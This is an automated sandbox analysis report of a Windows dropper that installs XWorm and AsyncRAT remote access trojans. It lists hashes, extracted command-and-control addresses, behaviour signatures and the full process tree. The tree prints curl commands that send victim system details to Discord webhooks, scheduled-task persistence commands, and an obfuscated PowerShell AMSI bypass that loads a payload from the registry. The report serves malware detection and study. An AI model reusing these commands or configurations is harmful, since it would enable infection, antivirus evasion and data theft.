Analysis

  • max time kernel
    86s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-06-2024 05:33

General

  • Target

    Dropper.exe

  • Size

    1.4MB

  • MD5

    19b0c113a289ffdac673f5746be14b9d

  • SHA1

    5a6f5fa38916a6058c88d5f45fc37f89872c0cb9

  • SHA256

    24e5bb5ab34a162b750abc2d8a38a48afceee92fc256f2a2fc3ff49f327fbf4a

  • SHA512

    253d62161d97ad83ba272a1e749a8cbfda51bf7b2e2825d98e41039208fc22b1f91315a0e8c6ee84d3c6b4e6f2867bf64e7bb53bb77384ab6a3340338896806e

  • SSDEEP

    12288:w8w1hc0Q53LOAGkjwtBx5n4AYakafNh/2mPj/YDLm7GylDULvEd8oK/mngAmgIv:wjmwDtPjwuB

Malware Config

Extracted

Family

xworm

C2

politics-fiber.gl.at.ply.gg:47430

Attributes
  • Install_directory

    %AppData%

  • install_file

    $77-scchost.exe

Extracted

Family

asyncrat

Botnet

Default

C2

environmental-blank.gl.at.ply.gg:25944

Attributes
  • delay

    1

  • install

    true

  • install_file

    $77-aachost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 18 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1016
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{903f9ed0-271d-4fa2-9c9f-890a96010122}
        2⤵
        • Modifies data under HKEY_USERS
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5048
        • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
          "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
          3⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:2348
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:5464
            • C:\Windows\System32\Conhost.exe
              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              5⤵
                PID:5472
          • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
            "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            PID:508
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit
              4⤵
                PID:5576
                • C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  5⤵
                    PID:5628
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'
                    5⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:5732
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmp7F0E.tmp.bat""
                  4⤵
                  • Modifies data under HKEY_USERS
                  PID:5672
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    5⤵
                      PID:5688
                    • C:\Windows\system32\timeout.exe
                      timeout 3
                      5⤵
                      • Delays execution with timeout.exe
                      PID:5968
                • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                  "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
                  3⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:3484
            • C:\Windows\system32\lsass.exe
              C:\Windows\system32\lsass.exe
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:668
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
              1⤵
                PID:940
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                1⤵
                  PID:396
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                  1⤵
                    PID:1044
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1116
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      1⤵
                        PID:1124
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1140
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1148
                        • C:\Windows\system32\taskhostw.exe
                          taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                          2⤵
                            PID:2736
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KheAFTgcWVjf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wQHPWKZNqUmUHS,[Parameter(Position=1)][Type]$FfDLwCFLwj)$CNoGlYvJxaa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+[Char](108)+'ec'+'t'+''+[Char](101)+'d'+[Char](68)+''+'e'+'le'+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Memor'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+','+'P'+'u'+[Char](98)+'li'+'c'+','+[Char](83)+''+[Char](101)+'a'+[Char](108)+'ed,'+[Char](65)+''+[Char](110)+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+'o'+'C'+'l'+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$CNoGlYvJxaa.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'P'+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wQHPWKZNqUmUHS).SetImplementationFlags('R'+[Char](117)+'n'+'t'+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'ag'+'e'+''+[Char](100)+'');$CNoGlYvJxaa.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+'k'+'e','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+'N'+[Char](101)+'wS'+'l'+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$FfDLwCFLwj,$wQHPWKZNqUmUHS).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+'ged');Write-Output $CNoGlYvJxaa.CreateType();}$zlSZHQSZDdIbd=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+'o'+''+[Char](115)+'of'+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+'2'+''+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+'t'+'i'+'v'+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$LPNWelmbpYSLwo=$zlSZHQSZDdIbd.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+'o'+'c'+''+[Char](65)+'d'+[Char](100)+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ccnNdwrbLmwftmoBeKi=KheAFTgcWVjf @([String])([IntPtr]);$bVQwzdyqubsKquGnQrBRlb=KheAFTgcWVjf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cyjiJAhoJrQ=$zlSZHQSZDdIbd.GetMethod('G'+[Char](101)+''+'t'+''+'M'+''+'o'+''+'d'+''+[Char](117)+'l'+[Char](101)+''+'H'+''+'a'+''+[Char](110)+'dl'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+'e'+''+[Char](108)+'32'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$eepqzGCebUEmqC=$LPNWelmbpYSLwo.Invoke($Null,@([Object]$cyjiJAhoJrQ,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$dFswwMZgFBecwnDhF=$LPNWelmbpYSLwo.Invoke($Null,@([Object]$cyjiJAhoJrQ,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+'r'+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$JDKnOsM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eepqzGCebUEmqC,$ccnNdwrbLmwftmoBeKi).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$YlYSDLczSfqNbAFze=$LPNWelmbpYSLwo.Invoke($Null,@([Object]$JDKnOsM,[Object]('A'+'m'+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+'B'+'u'+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$UISooMkNsu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dFswwMZgFBecwnDhF,$bVQwzdyqubsKquGnQrBRlb).Invoke($YlYSDLczSfqNbAFze,[uint32]8,4,[ref]$UISooMkNsu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YlYSDLczSfqNbAFze,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dFswwMZgFBecwnDhF,$bVQwzdyqubsKquGnQrBRlb).Invoke($YlYSDLczSfqNbAFze,[uint32]8,0x20,[ref]$UISooMkNsu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+'W'+'A'+''+[Char](82)+'E').GetValue('$'+'7'+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4344
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                                PID:3156
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                              • Executes dropped EXE
                              PID:6112
                            • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                              2⤵
                                PID:5660
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                              1⤵
                                PID:1224
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                1⤵
                                  PID:1308
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1332
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1372
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                      1⤵
                                        PID:1416
                                        • C:\Windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:2528
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                          1⤵
                                            PID:1576
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                            1⤵
                                              PID:1596
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              1⤵
                                                PID:1652
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                1⤵
                                                  PID:1696
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                  1⤵
                                                    PID:1724
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                    1⤵
                                                      PID:1772
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1828
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                        1⤵
                                                          PID:1880
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:1892
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:2008
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                              1⤵
                                                                PID:2024
                                                              • C:\Windows\System32\spoolsv.exe
                                                                C:\Windows\System32\spoolsv.exe
                                                                1⤵
                                                                  PID:2072
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2164
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2240
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2380
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2388
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2520
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                          1⤵
                                                                          • Drops file in System32 directory
                                                                          PID:2580
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2628
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2668
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2688
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                              1⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2704
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2724
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:2812
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3092
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3180
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                      • Modifies Internet Explorer settings
                                                                                      • Modifies registry class
                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      • Suspicious use of UnmapMainImage
                                                                                      PID:3428
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
                                                                                        2⤵
                                                                                        • Checks computer location settings
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1072
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          3⤵
                                                                                            PID:4600
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                            3⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4896
                                                                                            • C:\Windows\SysWOW64\curl.exe
                                                                                              curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                              4⤵
                                                                                                PID:4720
                                                                                            • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
                                                                                              3⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3924
                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
                                                                                                4⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:3908
                                                                                            • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
                                                                                              3⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1428
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
                                                                                                4⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:1388
                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
                                                                                                  5⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:2936
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.bat""
                                                                                                4⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2188
                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                  timeout 3
                                                                                                  5⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:4640
                                                                                                • C:\Users\Admin\AppData\Roaming\$77-aachost.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\$77-aachost.exe"
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2884
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 8\nMachine Name: OAILVCNY\nSystem Architecture: 64-bit\nHWID: 7580D06170B47B6124F3\nUser HWID: S-1-5-21-3808065738-1666277613-1125846146-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253702401148588093/dy9JeySIO-GmMDLOGujcr56gIgSixllB84150v7DKIbzkhbLiHitZal0nF3_B2IriNPY
                                                                                                    6⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3636
                                                                                                    • C:\Windows\system32\curl.exe
                                                                                                      curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 8\nMachine Name: OAILVCNY\nSystem Architecture: 64-bit\nHWID: 7580D06170B47B6124F3\nUser HWID: S-1-5-21-3808065738-1666277613-1125846146-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253702401148588093/dy9JeySIO-GmMDLOGujcr56gIgSixllB84150v7DKIbzkhbLiHitZal0nF3_B2IriNPY
                                                                                                      7⤵
                                                                                                        PID:2652
                                                                                              • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:3408
                                                                                              • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4936
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                            1⤵
                                                                                              PID:3592
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:3800
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4000
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4136
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4444
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:3660
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      1⤵
                                                                                                        PID:3168
